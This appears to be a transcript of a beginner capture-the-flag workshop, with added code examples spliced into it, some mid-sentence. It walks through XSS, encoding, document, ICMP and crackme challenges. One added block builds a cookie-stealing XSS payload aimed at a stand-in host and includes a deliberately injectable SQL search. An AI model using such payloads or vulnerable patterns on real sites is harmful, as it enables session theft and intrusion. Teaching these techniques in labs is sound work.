poke localhost we need to poke larry so what we said here is that we can use pivotbox for this task and the hostname is sysandmin ssh so I'm gonna use sysandmin ssh instead of my my localhost here and I'm gonna run it in the port 1012 in the hope that no one's had assigned itself this port before I do run my payload and I keep the document that cookie etc etc okay so let's try that now I need to send a link to larry you remember that that's what we saw fortunately enough this page is badly programmed as you can see this form is not a post it's a get which means that it gets into it gets that it goes into the top and the url bar so the content is there which means that we can send that link to larry and it will execute the javascript code this is called a reflected xss and it's not all the cases that it is like that in some other cases our payload would be even more complicated for example if this would require a post payload you would need to create a completely different page where larry would click but then inside that page in javascript you would do an ajax call with a post to this page I don't know if you followed but if you did you understand xss very well if you didn't just keep in mind that you uh if you give a link to someone it's gonna issue a get and so if if something needs to happen via a post you will need an intermediary page where you use javascript to turn that get into a post yeah so uh i'm gonna run it here so that so this is on system in ssh the reason i'm running it here is that i want the url that i will give larry okay so it's not that i expect any output out of this i won't have any output out of this so search now we have the good with the system in ssh all properly encoded for us for free no need to do url encoding and so on so i'm gonna leave that here i'm gonna go and start the server uh that's pivot box okay let's let's drop the port forward and let's go and access the key pair so i'm connecting to the server we connected in the sysadmin 
track. I'm going to launch a web server with the same port; no one was there, good. Then I'm going to copy this and give it to Larry the Link Clicker, and now I'm going to say "click, Larry, click". We can see here the URL was queued, and if we go and look, did we get something? Yes, we got the flag. So again, recapping what just happened: Larry got the URL, he clicked on it, his browser opened... oh, there's someone not muted that we hear breathing, if you could just double-check please. I think I found it. So this JavaScript code in the URL was reflected inside the page, it executed the image insertion, appended the cookie to the image insertion, and then created an image object with this as a URL, and then I get a GET request for an image with the content of the cookies, which contain the flag. Whoo, that's cool. And this is... the people who are good at XSS get really good at XSS, so this is a simple one, unfortunately for you, but I think the theory behind it is really sound, and you should at least know how to approach challenges like that from now on. So we solved it. OK, encoding.

Yeah, we can take rewards. So, encoding. Computers encode data in various ways and it's always evolving, well, I mean, yes and no, but yes, now we have MessagePack and protobuf and stuff like that and gRPC. In simpler times, you know, ASCII is a sort of encoding, but basically we always need to represent binary data, binary information, and depending on the protocol we need to avoid specific characters because they are important for that protocol. Email was an important example, because you need a way to carry files of arbitrary type inside something that was text-based and very lightly structured. So for email we invented uuencoding, I think. For the web we have other types of encoding. So I see that we have 25 solves, so this is a pretty straightforward one; many of you solved it a few seconds ago. But what I want you to know, I guess, is that you should recognize this with your eyes; this is everywhere. If you look at browser headers, if you look at many of the easier types of CTFs, one of the things that says what it is is the trailing equal sign, and also the character set used. The trailing equal sign is basically padding for base64.

Now there are two ways that you can decode things like this. One of them is to simply use echo and base64 on the command line: basically `echo -n`, because you want to remove the newline at the end of the echo, and then you pipe this into `base64 -d` for decode, and then you get the content. OK, but this is the old way; this is very entrenched in my muscle memory, which is why I still do it that way, but you're in CTF 101 and we are in 2021, you should use better tools. One such tool is CyberChef, done by the GCHQ, but it's open source and it runs in JavaScript, so it doesn't send all your CTF flags to the GCHQ so that they can win all the CTFs in the world. But maybe it does, I don't know, but I'll take my chances this time. Basically, with CyberChef you put your input in the box at the top, then you build a recipe, and then at the bottom you have the output. Here we could... I think there's a "Magic". Yeah, Magic, that's funny. Magic looks at different stuff and tries different things, and it failed, or it says the entropy, and it didn't do good, so boo, Magic didn't work. But as I told you, we know that this is base64, so this is going to be really easy and straightforward, just as the command line was: "From Base64". You have an option for an alphabet, because you can have a custom alphabet; I think in the standard there are some variations, and I've seen some malware that would use base64 but just reversed the alphabet, because it's hard-coded in the algorithm as a list of characters. So you try the base64 decode but it doesn't give you a result, and so you move on, but if you had reverse-engineered it you would have figured out that this was going on and you could have solved the issue earlier. It's an arms race, right? So the output of this is in this field: "you should recognize basic encoding techniques just by looking at them, congrats, because it just looks like you did, here's your flag".

CyberChef is way more powerful than what you just saw, and it's important to realize the power of combining the various tokens. You can also save the recipe with or without the data, in a couple of formats, so it's a good way to document where you're at in a challenge, if you're facing a challenge like that. It's a very powerful and useful tool that I strongly recommend learning. In some cases I even used its OCR capabilities. Oftentimes you get a challenge where they try to mess with you: they give you a badly encoded JPEG with thousands of characters, and you're like, oh, I'm never going to retype all this, I'm lost, I can't solve it. Well, it turns out that CyberChef's OCR is good enough that it could; of course you'll have to fix a few characters, but it's going to do that 80/20 or even 95/5 job for you and you can move along faster. So I've used it in many different contexts, work-related and CTF-related as well. It's a very good tool, I recommend it. But we need to extract this flag here.

"Sorry to interrupt, but I think we have a question about the XSS challenge in the chat." OK, yeah, sure, I think we have time. Which chat, the Zoom one? "The Zoom one, yeah." OK. So, the user agent that is calling the sysadmin ssh URL. Good question. So the setup: basically this mimics a friend that you send links to and that this friend clicks on, so it's to mimic a human, but the way it's built for
the CTF, is it a setup with PhantomJS or something like that? It's basically a bunch of JavaScript spawning a Chrome browser and instrumenting it so that it will run the code, and I know that I struggled building that bot to inject the flag in the cookies, so it might not be perfect. If you try to have very fancy JavaScript payloads it might fail on them. All this to say that it's not someone on duty tonight clicking on it, waiting to receive it; it's a Node.js app that, when it gets a script, will issue a command. Also, if people brute-force it or submit many, many submissions it might build a large queue or fall over. So if you think your payload should work and it's not working, you can share it on the Discord in the CTF 101 challenge channel. Don't share it on the Zoom, because the chat is just going to destroy it, it's going to be ugly, and others will be able to participate if you share it on Discord, and I'll be able to look at it after we close this call as well. So share it over there. But so it's not a standard user agent, and I haven't looked at the user agent variable, so it might be a bit confusing, or just PhantomJS, I'm not sure. OK, so I think you posted an answer. Well, Patrick, I hope it answered your question. Yes, Patrick. So Patrick said it's running server-side, where sysadmin ssh can be reached. Correct. So if you have your own server online it will be able to reach it, but yes, I deployed this container, the application is containerized, I deployed this container in the same network as sysadmin ssh, with the magic variables of Docker for resolving hosts. This is why we can use an unqualified domain like sysadmin ssh; in a real payload, of course, we need either an IP or a fully qualified domain, but in this context you are correct, it's because it's sitting right beside the sysadmin ssh system. You're following well, that's good. OK.
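Before leaving the web challenges, here is an added example, not code from the workshop, that puts the two injections side by side, since the root cause named above is the same for both: user input concatenated into something a parser will read (SQL, then HTML). The items table, the single-quoted LIKE query (the challenge used double quotes), the exfiltration host name and the http.server log line are all constructed assumptions.

```python
"""SQLi and reflected XSS from the same root cause: unescaped user input.
Added example; sample data and host names are constructed, not the challenge's."""
import html
import re
import sqlite3
import urllib.parse

# --- SQL injection: the item search box --------------------------------------

def make_db():
    """Constructed sample table; the flag row is the one we should not see."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (name TEXT)")
    con.executemany("INSERT INTO items VALUES (?)",
                    [("apple",), ("banana",), ("FLAG-constructed-sqli",)])
    return con

def vulnerable_search(con, term):
    """Query built by string concatenation, as the challenge's server did
    (assumed single-quoted here). ' OR 1=1 -- and a bare % both dump it all."""
    query = "SELECT name FROM items WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in con.execute(query)]

def safe_search(con, term):
    """Parameterised query with LIKE metacharacters escaped, so neither the
    quote-plus-comment trick nor the wildcard trick works any more."""
    escaped = re.sub(r"([\\%_])", r"\\\1", term)
    rows = con.execute("SELECT name FROM items WHERE name LIKE ? ESCAPE '\\'",
                       ("%" + escaped + "%",))
    return [row[0] for row in rows]

# --- Reflected XSS: the "you searched for" page -------------------------------

def render_search_page(q, escape_output):
    """The reflected page. escape_output=False is what the challenge did;
    True applies html.escape, which is the fix."""
    shown = html.escape(q, quote=True) if escape_output else q
    return ("<html><body><form><input name='q'></form>"
            "<p>You searched for " + shown + "</p></body></html>")

def contains_live_script(page_html):
    """An unescaped <script> tag in the reflected page will execute."""
    return re.search(r"<script\b", page_html, re.I) is not None

def exfil_payload(host, port):
    """The image-exfiltration payload from the walkthrough: create an <img>,
    point it at our server with document.cookie after the '?', append it."""
    return ("<script>var i=document.createElement('img');"
            "i.src='http://%s:%d/a.gif?'+document.cookie;"
            "document.body.appendChild(i);</script>" % (host, port))

def larry_url(search_url, host, port):
    """URL-encode the payload into the GET form's q parameter, which is what
    the browser did for us when we submitted the search form."""
    return search_url + "?" + urllib.parse.urlencode({"q": exfil_payload(host, port)})

def cookie_from_log_line(line):
    """Recover the cookie from a `python -m http.server` access-log line such as
    '::1 - - [..] "GET /a.gif?session=FLAG-x HTTP/1.1" 404 -' (constructed)."""
    m = re.search(r'"GET \S*?\?(\S+) HTTP/', line)
    return urllib.parse.unquote(m.group(1)) if m else ""

if __name__ == "__main__":
    con = make_db()
    print(vulnerable_search(con, "test' OR 1=1 --"), vulnerable_search(con, "%"))
    print(safe_search(con, "test' OR 1=1 --"), safe_search(con, "%"))
    print(larry_url("http://larry.example/search", "exfil.example", 1012))
```

The safe variant needs both halves: binding the parameter stops the quote and comment from reaching the SQL parser, and the ESCAPE clause stops `%` and `_` from being wildcards, which is the unintended solve shown above.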
Let's move on to the... oh, did I take the sip? I forgot, let's have one just in case. Victory sip for encoding. All right, so 14 solves already. Eric is at the top, but I think it's Eric's third year participating in the CTF 101, so don't feel bad because he's on top.

So this document contains two flags; this is the easiest of the two. These "forensic", let's put it in quotes, challenges are weird territory, because if you're not a programmer and you never did XSS and you never did binary, it's where you will probably end up and lose a bunch of time. But the problem is that, I don't want to be rude but I'll be blunt, they fuck you up. It's oftentimes not realistic; it doesn't necessarily connect to reality. Sometimes it does; sometimes forensic tracks are real, like someone got owned, then you arrive and you have a disk image and you need to figure out what happened, but these are rare because they are hard to recreate; challenges like this are hard to do. Most of the time it's just "I've hidden a binary inside the soundtrack, and ha ha, I used something super custom and you'll need to write a fast Fourier transform by hand to extract the bits, good luck". I mean, they are cool to do, they are time-consuming. But this one here is one that I faced; it's a recreation of one that I faced at HackUS a couple of years ago, where we tried everything, because we were bad at it, and I didn't solve it, but when I was told the answer I was like, I'm never going to forget. So let's go.

OK, so we said a hard one and an easy one; let's go easy. We have a document, a couple of pages, clearly stolen from some university. It's not stolen, it's borrowed; anyway, it's public. So we're looking for "flag". And this is important, you make links, right: all the flags so far had "FLAG-" in them, so why not do a Ctrl-F and search for "flag"? And oh, we have a hit somewhere in a white area. This is why I warned you that these can be called, as someone said on the Zoom chat, the free-for-all category, right. Someone is pasting... yeah, the document is in French but it doesn't matter, the flags are flags. It's a course plan for a cybersecurity program that is from 2009, but this here is clearly just the good old white-on-white technique, and if you change the color of the text, aha, it's going to reveal itself, right? So this is one way to solve it.

Another one that is, I guess, better, and that might be the reflex that others had, because opening a Word document on a computer, it should be in a VM, right? You don't know what's going to be in it, so you should do this from a VM, and so you need to copy it into your VM; it's just more work. So you could just basically `strings` the thing, and it turns out that it doesn't reveal much. This is an old-fashioned .doc, it's not a .docx, which is getting rarer and rarer. But something that is important, a learning opportunity here: `strings` by default looks for ASCII strings, it doesn't look by default for Microsoft's wide strings. So let's add the wide string search; I think this is `-e l`, not quite sure. Oh yeah, I got it. So we see a lot more text now that we added wide strings, and why `strings` doesn't do it by default, I don't know, to be honest, but I always run both now. Running it that way you basically get 300 lines of strings instead of nine, so it's worth doing. And now that we did that, the flag was at the end of the document, and so here it is. Another strategy, and this even works for some binary challenges, is that you list all of the strings and then you grep without capitalization for "flag", and boom, you got it. One-liner shell and you solve everything. OK.
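To make the ASCII-versus-wide-strings difference above concrete, here is an added example, not from the workshop, that reimplements the two `strings` passes and the `grep -i flag` step in Python and runs them over a constructed stand-in for the .doc (OLE2 magic bytes, some binary noise, French course text stored as UTF-16LE, an ASCII decoy, and the hidden flag stored the way Word stores text). The sample bytes and the flag value are constructed.

```python
"""strings vs strings -e l, reimplemented so the difference is visible.
Added example; SAMPLE_DOC is a constructed stand-in, not the challenge file."""
import re

def ascii_strings(data, minlen=4):
    """What plain `strings` finds: runs of printable ASCII bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]

def utf16le_strings(data, minlen=4):
    """What `strings -e l` finds: printable ASCII with a NUL after each byte,
    which is how Office and Windows store 'wide' text."""
    return [m.group().decode("utf-16-le")
            for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % minlen, data)]

def find_flags(data, prefix="flag-"):
    """Both passes piped into a case-insensitive grep for the flag prefix."""
    found = ascii_strings(data) + utf16le_strings(data)
    pat = re.compile(re.escape(prefix) + r"\S+", re.I)
    return [m.group() for s in found for m in pat.finditer(s)]

# Constructed stand-in for the .doc. Plain `strings` sees only the ASCII decoy
# and some noise; the course text and the white-on-white flag are wide strings.
SAMPLE_DOC = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"          # OLE2 compound file magic
              + bytes(range(256))[::7]                     # binary noise
              + "Plan de cours 2009".encode("utf-16-le")
              + b"\x00\x13\x02"
              + b"Microsoft Word 97" + b"\x00\x00"         # ASCII decoy
              + "Ce flag est FLAG-constructed-wide-string".encode("utf-16-le")
              + b"\xff" * 16)

if __name__ == "__main__":
    print("ascii :", ascii_strings(SAMPLE_DOC))
    print("wide  :", utf16le_strings(SAMPLE_DOC))
    print("flags :", find_flags(SAMPLE_DOC))
```

Running only `ascii_strings` on the sample reproduces the "nine lines of nothing useful" result; the flag only appears once the UTF-16LE pass is added, which is why both passes are worth running every time.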
So, yeah, both techniques work. One of the other approaches that I've seen, I've heard of, is you basically do a select-all, you take all of the bits from the information and you paste it in another document, and so anything that would be the fonts would be reduced, or changes to the document would reveal themselves, especially in some plain-text application, for example. So let's submit that flag, here we go.

Another flag in the same document, a little harder to find: "this is the same document as challenge Document 1, and the flag is in French, but it still starts with FLAG-". OK, still starts with FLAG-, cool. So, now you're just going to hate me, because the way I'm going to solve this is by clearly showing that I know what's going on, right. What I want you to take away from this is that it's the method that is important here, and also how mischievous or uncool challenge designers can be, and to have maybe an open mind about what the solution can be. Earlier I said that there's a challenge that I will remember all my life, and this is it, that's the one. So let's use that approach that I mentioned earlier, of pasting paragraphs in a standard text editor and looking at it. I'm going to use vim. So we're looking at this, OK, I can read all this, there's nothing unexpected, cool. All right, you notice how I avoided the first paragraph on purpose. So now let's go back to the first paragraph, paste that here. Aha: a little "f" here, there's a capital "L" here, there is a capital "A" here, there's a capital "J" here. What's going on? Am I chopping off? I got a message from Zoom saying it's unstable. No, it's all right. OK, because now I think someone started Netflix, but I should be fine, I have enough bandwidth; let me know if something's going wrong. OK, so another hint that we have here is that this is the only paragraph where we have mistakes, right? So it looks like something's not right, there is a problem. What we could do is just explode everything... and maybe with this? No. OK, let's put everything in black. Oh, here we go, we see characters appearing. So now we could solve the challenge by manually trimming stuff down, but why don't we write a little bit of Python?

What we're going to do is copy this and open an IPython console. This is another tool that I recommend learning; you could use IPython or IPython notebooks. Ah, you know what, why not show straight IPython notebooks, it's better. Whoops, it complained something about "you'll likely want to use jupyter notebook". OK, it's going to bring me there, and I'm going to go and come back here and copy. I have a full workshop about Jupyter notebooks that I do with Masarah, which I recommend; I recommend learning about Jupyter notebooks, they are a very great tool, self-documenting, to write code. Basically this is a Python interpreter and you can iterate on data easily and you can even graph in it rather easily, so to do some of what I'm about to do it's very nice.

OK, so we copy that string here, let's take a look at it. OK, that's good. Now we want to split on every word, so let's do split. Is this the way split works, like that? Yes, OK, cool. Now we want to take the last character, right, this last, last, last... the last character of every word. So I think we're going to need a list comprehension: for word in this... oops. OK, so I'm building a list comprehension, another very strong Python construct. Basically I'm saying give me all words, and this is just a variable name, in this that I split, so I'm basically just reassembling it, but now I want the last character, if I'm not mistaken... no, this is reverse, this is removing the last character. Just right, I heard someone: just minus one, but you were going to do it anyway. Yes, OK, cool. So I got something, and it said that the flag was in French, and you can see that eventually the mistakes stopped in the document; here there's no longer a mistake. You can switch your spell check, there's a bunch of things you can do if you're not native. Don't worry, it's just because this challenge was made a while ago that it's in French; you won't have stuff like that at NorthSec. But now, OK, I have the flag but it's not super clear. What we could do then with this is join the list, like that, and so what we have now is... oh, we have a couple of mistakes, it stops working. Oh, this is probably bad, the commas are also bad, let's get rid of them, and the dot, all right, and the dot here as well. OK, so we got... the "t" here is another mistake; it is a valid French word. So it's "flag le flag du fin observat", commas, so there's another comma to fix, here we go: "FLAG-Le flag du fin observateur", and we'll add the capital F at the beginning. Yep, yep, yep. Again, I know I should feel bad showing you something like this, but it's a real case of a real flag that we never saw, and it was a teacher, a professor at university, who created the challenge. I was like, I have messages everywhere, and he was right.

All right, so let's move on to network. PCAPs. I love PCAPs, because every CTF has PCAP challenges, and also I'm a former network person. So I forgot the sip of victory. When you have a PCAP, you open Wireshark, don't ask any more questions, and if you realize you need to scale out of Wireshark then do something about it later, but Wireshark is so powerful you should always rely on it. Important aspects of Wireshark: oftentimes you'll get garbage with the PCAP that you have, and
maybe sometimes not, but here it's a very clean and crisp PCAP. But still there's a lot of stuff, right? If you ever dive into Wireshark you can be like, oh, this could mean something, this could mean something, this could mean something. So at some point you need to trust several layers of the protocols, and if you have formal training on networking you will realize where stuff could be hidden. But at the same time, challenges need to be fun, right? If the challenge designer encoded hidden data in the TCP checksum with an XOR pattern, yeah, clap, you did it, but it's not necessarily a good challenge. All this to say that network PCAPs are like other types of forensic challenge: some of them can be really fun and great and challenging, others can be just you looking for the needle in the haystack, never finding it, but once you know it, it takes three seconds to solve. So you almost always need to give yourself a break: if after 45 minutes I'm still digging and I have no idea what I'm looking at, send it to someone else, shift context, etc.

OK, what we have here is a ping to 8.8.8.8. It looks like a request/reply, it looks like a normal ping, and there's a bunch of A's. The layers look OK. I could do `icmp contains flag`: I have no result. Not the dot, but `contains`; `contains` is a very powerful verb in Wireshark, basically you can query every protocol and ask if it contains something, very useful for HTTP. You also have a bunch of tools and statistics to see who's chatting with whom, but this doesn't really apply to this PCAP. For this specific challenge, what we'll do is... should I do that? OK, yeah, let's try to do a capture on my Wi-Fi, but with a filter for ICMP; hopefully I won't leak any data. OK, so I'll ping 8.8.8.8 and we'll see what we have. I don't care. So I pinged 8.8.8.8, so I can compare, right. Oh, OK, so if I compare, I don't get the A's, I don't have the same thing. In the data I have something different, something that looks linear, right, that increases, and then 12345 and so on. So what am I looking at that is different from the other capture? Let's reopen it. Well, I have a bunch of F's here, and then the reply contains a bunch of F's, and we have to remember that ping was used to detect problems at the physical layer, where there was some bit corruption happening back then, so it was important for the payload to be reflected back 100% identically. But now we check the second one and it's "l", "F", "l", and we check the third one and it's all capital letters. Can we do something with it? Yes.

So let's go back to our Jupyter notebook. Oops, I shut it down; started back up. OK, don't restart, let's save it. This was the document, and then I'm going to go back home, why not, save it, and then create a new one for the PCAP. OK, what I didn't tell you earlier is that the Jupyter notebook is also an execution environment: if you put a dollar bang in front of a command it's going to run. So we can do something like that, pretty cool, right? So what we're going to have is a self-documenting recipe to solve that PCAP using tshark and the command line. So what I'm going to do here is read this PCAP, whose name I forgot... "network troubleshooting", all right, we're going to read that. I'm a very big Wireshark user and I know by heart that if I need to extract the data... and OK, again, full disclaimer: this could be solved by hand, for sure, 100%. The reason I'm showing this to you is that for the harder CTFs, what they're going to do is, instead of just the flag in several payloads, they're going to encode a binary in there, in the payload, and you have like four megabytes of stuff to extract, so if you don't script it you will basically spend the weekend just copying
the stuff and uh and after that there's an exploitation or a reverse engineering challenge that you need to solve right so i'm showing you like how to approach everything programmatically tonight so i'm gonna do this and as a test to see if it worked i'm gonna extract a field that is very easy to uh gather and this is gonna be uh ip destination why not so uh one way let's yeah let's just go ipvst so the dash t fields in a t-shark is a special construct that puts it in the mode where it wants to uh extract fields only fields and not its usual text output and then every dash e and uh the name of a of a token and wire chart is gonna be extracted and these are gonna be tabs separated so it's kind of csv but it's tabs instead of commas and it's readable by excel and all the good stuff so i'm gonna see does that work okay ip destination 1888122 it does make sense because it's uh destination and then uh source and destination so if we look we are reading that correct okay so now let's move on what we want we want the data payload so the the way to find how to extract the payload is to do uh right click prepare as a filter and then selected and what you'll see above is how wire shark classifies that uh that thing right so this is called data that data if i would look like at for example the icmp type let's say this is what i wanted to extract i would have i would do the prepare as filter trick again and i would see that it's icmp dot type so um i want the data because the rest doesn't seem interesting yet so boom with this i get i have the data now when you run commands in jupiter what you could do is assign it to a python variable very easily so if i do this and i look at data what i have is a list of the output all uh without carriage return at the end now i want the last two characters so we're gonna enter list continuation mode for let's call this t for token in data and let's say that i want the last two characters so that would be uh this i guess alain no so this is 
going to be the second or last but oh i i want the zero or i think zero for the two last zero now maybe minus one minus one close close but not quite or maybe minus one minus two oh let's forget that or minus three not sure ah oh it's the it's the comma to say like the rest right that's why we have co workshop assistants um the okay so basically minus two and the the column so if i would remove the column i would get only four but if i stick the column i say that i'm doing a sub a list slice up to the end of the list and this is why minus one gave still just one character etc so okay so now we have the last two but we need it uh so we we we want it to be this is hex and we want it to be char's but this is hex so what i could do is cast them as hint as x and this is just python muscle memory uh you know so hex is base 16 and there's there's there might be a fancier method of doing so but but i know that this is gonna work so with this i get a pure because i had quotes around the previous version with this i get pure ints which is good because this is what chr expect because i'm gonna run chr around that and then i get something uh out of it now i would like to drop every one out of two how could i do that so i see two ways of doing that i could here in my iterator uh use a fancy python construct to drop one every out of two but i could also apply a filter capture and say just uh ip destination equals 8888 so i only have one here right many ways to the same thing and then let's use what we used as a trick last time around we join uh we join all of this together and uh we should have something that works so flag network forensic expert so being a programmer is really good for CTF as you can see and i shouldn't say that i'm a programmer so being adequate at programming all right so we're getting into the the the last mile but the the difficult part of the of the of the night and we're gonna so what i'm gonna do is i'm gonna introduce you to the the challenge and uh so 
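The payload-extraction recipe described above (tshark field output, last byte of each ICMP payload, hex to char, drop the mirrored replies, join), as an added Python example that is not the workshop's own notebook. It assumes the capture was exported with something like "tshark -r network-troubleshooting.pcap -T fields -e ip.src -e ip.dst -e data", giving one tab-separated line per packet; the sample output, the local address 192.168.1.10 and the 32-byte payload size are constructed here, and the "default Linux ping pattern" check assumes the stock ping payload layout (8-byte timestamp followed by bytes 0x10, 0x11, ...), which is the linear pattern seen in the live capture.

```python
"""Decode a message hidden in ICMP echo payloads, starting from tshark -T fields output."""
from typing import List, Tuple

PING_TARGET = "8.8.8.8"          # destination pinged in the workshop pcap
LOCAL_HOST = "192.168.1.10"      # constructed source address
PAYLOAD_LEN = 32                 # constructed payload size in bytes


def make_sample_output(secret: str) -> str:
    """Constructed tshark output: each secret byte rides in the last payload byte of an
    echo request, and the echo reply mirrors the whole payload (so every byte appears twice)."""
    lines = []
    for ch in secret:
        payload_hex = "41" * (PAYLOAD_LEN - 1) + f"{ord(ch):02x}"   # 'AAA...' + secret byte
        lines.append(f"{LOCAL_HOST}\t{PING_TARGET}\t{payload_hex}")   # echo request
        lines.append(f"{PING_TARGET}\t{LOCAL_HOST}\t{payload_hex}")   # echo reply
    return "\n".join(lines) + "\n"


def default_ping_payload() -> str:
    """Constructed stock-Linux-style payload: 8 timestamp bytes, then 0x10, 0x11, ... (assumed layout)."""
    return bytes(8).hex() + bytes(range(0x10, 0x10 + 48)).hex()


def parse_fields(text: str) -> List[Tuple[str, str, str]]:
    """Parse tab-separated (src, dst, data) rows; packets without a data field are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) == 3 and parts[2]:
            rows.append((parts[0], parts[1], parts[2]))
    return rows


def last_byte_as_char(payload_hex: str) -> str:
    """payload_hex[-2:] is the last byte as two hex digits; int(..., 16) then chr()."""
    return chr(int(payload_hex[-2:], 16))


def recover_by_filter(text: str, dst: str = PING_TARGET) -> str:
    """Variant 1: keep only packets toward the ping target (what ip.dst == 8.8.8.8 does)."""
    return "".join(last_byte_as_char(data) for _, d, data in parse_fields(text) if d == dst)


def recover_by_slicing(text: str) -> str:
    """Variant 2: keep every other row with a slice, relying on request/reply alternation."""
    rows = parse_fields(text)
    return "".join(last_byte_as_char(data) for _, _, data in rows[::2])


def looks_like_default_linux_ping(payload_hex: str) -> bool:
    """True when the bytes after the 8-byte timestamp increase by one from 0x10 (assumed stock pattern)."""
    raw = bytes.fromhex(payload_hex)
    if len(raw) < 16:
        return False
    tail = raw[8:]
    return all(tail[i] == (0x10 + i) & 0xFF for i in range(len(tail)))


def suspicious_rows(text: str) -> List[Tuple[str, str, str]]:
    """Defender's triage: rows whose payload is not the stock pattern deserve a look."""
    return [r for r in parse_fields(text) if not looks_like_default_linux_ping(r[2])]


if __name__ == "__main__":
    sample = make_sample_output("flag-example")
    print(recover_by_filter(sample))
    print(len(suspicious_rows(sample)), "packets with a non-default payload")
```

Both variants give the same string on the constructed sample; the filter variant is the robust one, because the slicing variant silently breaks as soon as a reply is missing or packets arrive out of order.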
we're going to solve this. We're going to spend a bunch of time on that because I want you to get an idea of how to approach binary challenges with a static approach and a dynamic approach. We're going to do dynamic first and then static, and we're going to even do a hybrid approach, like using dynamic to get closer to where you want to be and then finish off (I forgot how I started my sentence) using static to know what you want to avoid, and then using dynamic to skip it or work around it, right? But first we need to take that sip. Okay, the crackme: there are two flavors of it. The difference between the normal version and the hard version is that the hard version is stripped. Okay, yeah, that's good, we have some time I think, so let's take the time to look at the difference between the two. So I'm going to download this here, whoops, put it in forensic... that's an insult to forensics. Reverse... that's an insult to reversing. Crackmes. And then the hard one. I'm going to open Ghidra, or we could say "guide or go back", and I'm not making fun of anyone, I just love playing with words. Yeah, that's a great project name, and then "project does not exist"; well, create it. Oh no, that's okay, that's because it's reverse, good. And we start the dragon. So I'm looking at it in static first; this is not how I would approach it, well, I mean, you should do both anyway, or start with one and switch to the other, but this is not how I intended to approach it. But to show the difference between the two, I think this is the best tool. So, up, crackme, boom, the dragon is crunching. Analyze it, please. Yes, yes. And then I import the other one, analyze it please, all the default values; my Ghidra setup is very vanilla. Did it override it? Oh no, I never ran two binaries; I knew that Ghidra supported it but I never did it. Okay, so if we look at the normal one we can see that there are names, and if
we go to the main we can see that this just looks like code, right: printf, dramatic, compute, raise, printf, putchar, dramatic; we see all of the stuff. If we look at the hard one and go to the main... oh, we don't have a main. We have FUN_... Is it too small? I figure you're all on computers so it should be okay, but yeah, let's do it like that. So basically, everything that is within the program's boundaries, so not the C library, not syscalls and stuff like that, everything in there doesn't have symbols anymore, so the entries are obfuscated, or stripped, basically; that's what it's called, it's just stripped, because you don't need it and it takes space. This existed in the days where they would save dates using two-digit years instead of four because it could save two bytes of memory. This is how old this stuff is, right? Not this specific binary, but compilers in general. So basically, with this binary you need to figure out where the real main is, and then once you're in it, look, it's the same main. You develop a muscle memory: I knew that the entry, which is the libc stuff, would jump into the main and it would be the first argument. So this is the real main written by the user. We can also rename it, you know, with Ghidra. So we have the setbuf and the printf because these come from the C library, but we don't have what we had as compute and dramatic; actually, that's dramatic and that's compute. But we do have strings as is, right? This is not an obfuscator, this is just stripped, meant for performance or storage or memory reasons. So this is the difference. It makes the stuff a little bit harder, especially dynamic analysis, because you need to refer to memory addresses instead of using symbolic names. So for this solve we are going to use the
one with symbols, because it's going to be more straightforward. Okay, now I've been talking non-stop for two hours, so I'm not sure if I want to take a break or not, because I don't want you to leave, but I was going to suggest a five-minute break. Is that too much or is that okay with you? You can use thumbs up / thumbs down to let me know. Okay, so yeah, five-minute break. In five minutes we're going to do the crackme, both dynamic and static, and if we have time after that we're going to try the bonus, the exploitation challenge. I will leave my screen like that, just mute myself, and I'll be back. So we are about to resume; checking a couple of messages before we do. Okay. First: never execute binaries that you don't know where they're from on your main system. This should be done inside a VM. You know, I wrote them and it's okay for you to do so today, but I was made aware of open CTFs at DEF CON where they basically had very nefarious commands and it would wipe people's computers if they ran it on their machine, and this is just bad taste, so be careful. I don't think it will happen at NorthSec, but sometimes it's unintended consequences, or your work AV getting in the way, and we always find our challenges on VirusTotal, so yeah, stuff like that happens. Okay, so we're going to keep Ghidra for later. I'm assuming everyone got back. We're not going to need Jupyter, so I'm just going to save it and close it. Same with this. Excellent. Okay, so, reverse. By default the files will not be executable when you download them. Oh, that's weird. Oh no, that's not weird actually: I was saying that it was smaller when you strip symbols, and it's about, you know, 20, 25, 26 K
smaller. So it's... oh no, sorry, not 26 K, 3 K smaller, so not negligible but still. So in order to run them, first you need to make them executable, so we're going to chmod, and we're going to use the symbolic way: u+x, so whatever's there, I don't care, add x to crackme, which means that now it's executable and now I can run it like that. When I run it I see "performing intense computation" and then "flag-" and then, at the peak of what I want to see, it segfaults, core dump. Now the first thing you could do, and should do, is run gdb on it. Your gdb might be way different from mine. If yours is vanilla, I strongly encourage everyone to avoid vanilla gdb because it's made for C programmers; it's not made for people that are reverse engineering binaries without source code. By default gdb is very helpful if you have some source code, not so if you don't, and we're not talking about a small step, we're talking about a massive step. You know what, actually I should show you, so let's remove my fancy pwndbg add-on. Okay, so this is vanilla gdb on the crackme, and I get this; so far so good, it's similar. But when I run it we see "performing intense computation" and then I see the error. I can look at the backtrace, but I got nothing else, right? And I need to remember the commands (which you have to do also with the fancier gdb), but in order to look at the stack you need to do info frame, info registers; you need to remember all of that stuff by heart and run it all the time, and you don't know if this is an address, is this ASCII, is this not... you need to build a lot of muscle memory. So if we do the same but reactivate my... I'm using pwndbg, but this is out of laziness; I've used PEDA, GEF and pwndbg, and I think GEF right now is the trendy one, but I mean, they're all good enough. So if we run it, what we
will get is a view that is helpful. I probably need to make everything smaller; yeah, let's go back. So this basically shows you the registers, the disassembly including an arrow where you are at, the stack values and the backtrace, all the time, so if you step you get the stuff in your face, which is very helpful; it's a lot faster to go about what you do. So let's get to the bug together. Right now we are in the raise command, which means that, if you see the address space, we are no longer in our program's address space, so we're basically right now debugging raise, which is probably not what we want to do. So what is this raise thing and why is it in the way? Let's take a look at it. I'm going to open a new window so I can switch back and forth. Let's do a man raise; we can maybe make it larger. Okay, so something to know about man pages is that often you're not in the right category: clearly this is Tk built-in commands, and Tk is a graphic toolkit, so this is not where we want to be. We're going to try man 2 raise; this is not the section. Maybe man -k to find where raise is defined. So man 3 raise: we want to be in section 3 instead of section n, which was the Tk stuff. In section 3 we are in the Linux programmer's manual: "send a signal to the caller". So basically it looks like this program is messing with us; it looks like it's just trying to kill itself. So let's run it again: it says "performing intense computation" and then it segfaults. So what we're going to try to do, and this is where we can combine static 